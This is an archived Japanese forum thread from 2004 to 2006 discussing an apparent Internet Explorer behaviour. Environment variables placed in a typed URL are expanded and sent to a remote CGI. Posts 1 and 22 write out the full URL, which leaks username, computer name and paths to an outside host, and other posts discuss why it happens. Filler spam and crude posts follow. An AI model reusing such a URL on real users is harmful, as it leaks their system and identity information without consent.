5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

IEの0dayアタック?

1 :名無しさん@お腹いっぱい。:04/10/29 16:52:33
なんかあるブログを見てたらIEから情報が漏れるみたいなことが書いてあったんですが
これはどういう原理でもれてるんですか?誰か教えてください
ちなみにttp://www.pbh.jp/cgi-bin/t3.cgi?USERDNSDOMAIN=%USERDNSDOMAIN%&USERD
OMAIN=%USERDOMAIN%&USERNAME=%USERNAME%&COMPUTERNAME=%COMPUTERNAME%&Path=%Pa
th%&ComSpec=%ComSpec%&HOMEDRIVE=%HOMEDRIVE%&HOMEPATH=%HOMEPATH%&LOGONSERVER
=%LOGONSERVER%&NUMBER_OF_PROCESSORS=%NUMBER_OF_PROCESSORS%&OS=%OS%&Os2LibPa
th=%Os2LibPath%&PATHEXT=%PATHEXT%&PROCESSOR_ARCHITECTURE=%PROCESSOR_ARCHITE
CTURE%&PROCESSOR_IDENTIFIER=%PROCESSOR_IDENTIFIER%&PROCESSOR_LEVEL=%PROCESS
OR_LEVEL%&PROCESSOR_REVISION=%PROCESSOR_REVISION%&ProgramFiles=%ProgramFile
s%&SystemDrive=%SystemDrive%&SystemRoot=%SystemRoot%&TEMP=%TEMP%&TMP=%TMP%&
USERPROFILE=%USERPROFILE%&windir=%windir%&ALLUSERSPROFILE=%ALLUSERSPROFILE%
&APPDATA=%APPDATA%&CommonProgramFiles=%CommonProgramFiles%&
注意:実際にはURLバーに1行で入れます
にアクセスすると私の名前とかが出てくるんです…


2 :kmbs:04/10/29 16:54:03
2get!

3 :名無しさん@お腹いっぱい。:04/10/29 16:54:13
えぇー

4 :名無しさん@お腹いっぱい。:04/10/29 16:57:36
4げと

5 :名無しさん@お腹いっぱい。:04/10/29 17:01:43
マシンの情報を表示してるだけじゃねえか
くだらん

6 :5:04/10/29 17:02:58
環境変数だな

7 :名無しさん@お腹いっぱい。:04/10/29 17:06:25
マシンの情報を表示すんのがあなだってことじゃねーの?


8 :5:04/10/29 17:10:09
穴じゃないだろう・・・これは
「仕様」の一言で片付けられるものだと思う

9 :名無しさん@お腹いっぱい。:04/10/29 17:23:53
リファラがあると表示されないみたいね
コピペで行くと表示される

10 :名無しさん@お腹いっぱい。:04/10/29 17:25:47
MS社員ハケーン


11 :名無しさん@お腹いっぱい。:04/10/30 07:54:48
ん、環境変数を%で囲ってURLに入れたら
勝手にその値に置き換えて送信するのか
初めて知った

12 :名無しさん@お腹いっぱい。:04/10/30 12:11:59
こういうのを「仕様」とかっていうやつ
本当にいるんだねぇ


13 :名無しさん@お腹いっぱい。:04/10/30 16:56:14
IE(mshtml.dll)単体では展開しないけど、それをくるんでいるシェル部分が勝手に展開しちゃうみたいですね。
その証拠に、シェルを経由しないように、meta refreshを使って環境変数展開を入れたURLに飛んでも展開されてません。
だからIEレンダラを使うぷにる他は無害と見ていいでしょう。

なお、「ファイル名を指定して実行」で同URLを入れても展開されます。
この場合には、既定のブラウザに展開された状態で渡されてます。
(Mozilla等に渡された時点ですでに展開済み)

激しく既知だろうからsageとく。


14 :名無しさん@お腹いっぱい。:04/11/02 11:59:15
仕様は仕様だと思うよ。すくなくとも bug じゃない印象。

ただし、「悪用される恐れのある仕様」のように思われるので、
MS には仕様変更をキボン

15 :名無しさん@お腹いっぱい。:04/11/05 18:11:47
http://d.hatena.ne.jp/anemo/20041027

ここに詳しい

16 :名無しさん@お腹いっぱい。:04/11/14 01:43:06
うわーこれはおもしろいです。
なんか使えそうですね!

17 :名無しさん@お腹いっぱい。:05/01/13 22:08:20
>>1


18 :名無しさん@お腹いっぱい。:05/01/15 19:02:10
  ∧_∧
  ( ・∀・)   | | ガッ
 と    )    | |
   Y /ノ     人
    / )    <  >__Λ∩
  _/し' //. V`Д´)/
 (_フ彡

19 :名無しさん@お腹いっぱい。:05/02/27 00:22:19
hoshu
b

20 :名無しさん@お腹いっぱい。:05/03/05 23:14:41
nurupo

21 :名無しさん@お腹いっぱい。:05/03/06 19:46:03
  ∧_∧
  ( ・∀・)   | | ガッ
 と    )    | |
   Y /ノ     人
    / )    <  >__Λ∩
  _/し' //. V`Д´)/
 (_フ彡

22 :名無しさん@お腹いっぱい。:05/03/06 22:15:29
http://www.pbh.jp/cgi-bin/t3.cgi?USERDNSDOMAIN=%USERDNSDOMAIN%&USERDOMAIN=%USERDOMAIN%&USERNAME=%USERNAME%&COMPUTERNAME=%COMPUTERNAME%&Path=%Pa
th%&ComSpec=%ComSpec%&HOMEDRIVE=%HOMEDRIVE%&HOMEPATH=%HOMEPATH%&LOGONSERVER
=%LOGONSERVER%&NUMBER_OF_PROCESSORS=%NUMBER_OF_PROCESSORS%&OS=%OS%&Os2LibPa
th=%Os2LibPath%&PATHEXT=%PATHEXT%&PROCESSOR_ARCHITECTURE=%PROCESSOR_ARCHITE
CTURE%&PROCESSOR_IDENTIFIER=%PROCESSOR_IDENTIFIER%&PROCESSOR_LEVEL=%PROCESS
OR_LEVEL%&PROCESSOR_REVISION=%PROCESSOR_REVISION%&ProgramFiles=%ProgramFile
s%&SystemDrive=%SystemDrive%&SystemRoot=%SystemRoot%&TEMP=%TEMP%&TMP=%TMP%&
USERPROFILE=%USERPROFILE%&windir=%windir%&ALLUSERSPROFILE=%ALLUSERSPROFILE%
&APPDATA=%APPDATA%&CommonProgramFiles=%CommonProgramFiles%&nullpo

23 :名無しさん@お腹いっぱい。:05/03/07 10:38:47
       (  _,, -''"      ',                                ____
    ニ    .( l         ',____,、       .,.. 、.               /      \
   ハ   ( .',         ト───‐'     /r.、_,ヽ'テ`---. 、         l        │
   ハ   (  .',         |.         ,. '" '", ‐゙"       `'ー-.、   |  ニ 仕   |
       ( /ィ         h         /  .,. ヤ ,  ,       ヽ  、ヽ.ヽ  |  ハ 様 │
⌒⌒⌒ヽ(⌒ヽ/ ',         l.l      ゝ 〈 i.  i.  | i.  l i. l',. ヽ ゙i. ヾヽ |  ハ だ|
        ̄   ',       fllJ       / ゝ/l.  |  ,li'+ メ l | / ';ヾ',  l、 l ' |   !   │
            ヾ     ル'ノ |ll    ./ / `カ"l  |  ´| レ'  レ  .l' .i | ',.|  l         |
             〉vw'レハノ   l.lll..  ../ i . 〃 ', ,|  ,l /    ヽ  l.',.l  リ . ヽ  ____/
             l_,,, =====、_ !'lll  ./  i 〃  .`{|  |'''' ヽ---/ ゙゙゙i ',-く.    )ノ
          _,,ノ※※※※※`ー,,  /  i /.!.   | l  |   \/ ._, イ  ',. ヾ
       -‐'"´ ヽ※※※※※_,, -''"`''ー-、' .L_   | li  iヾー---rヘi  |  ', l
              ̄ ̄ ̄ ̄ ̄       `''ー-、..,ハ|.i   ', ミ.T'iノ .||. |.  ', !

24 :名無しさん@お腹いっぱい。:2005/03/23(水) 23:10:15
  ∧_∧
  ( ・∀・)   | | ガッ
 と    )    | |
   Y /ノ     人
    / )    <  >__Λ∩
  _/し' //. V`Д´)/  →>>22
 (_フ彡


25 :名無しさん@お腹いっぱい。:2005/07/08(金) 13:25:32
パイズリ

26 :名無しさん@お腹いっぱい。:2006/06/03(土) 10:07:50
おめこ

27 :名無しさん@お腹いっぱい。:2006/08/18(金) 23:30:24
一太郎も0 dayアタック
NHKニュースでも話題に
狙いは日本政府の機密情報だとか(ホンマかいな)

一太郎2005/2006 セキュリティ更新モジュール
http://www3.justsystem.co.jp/download/ichitaro/up/win/060818.html

7 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)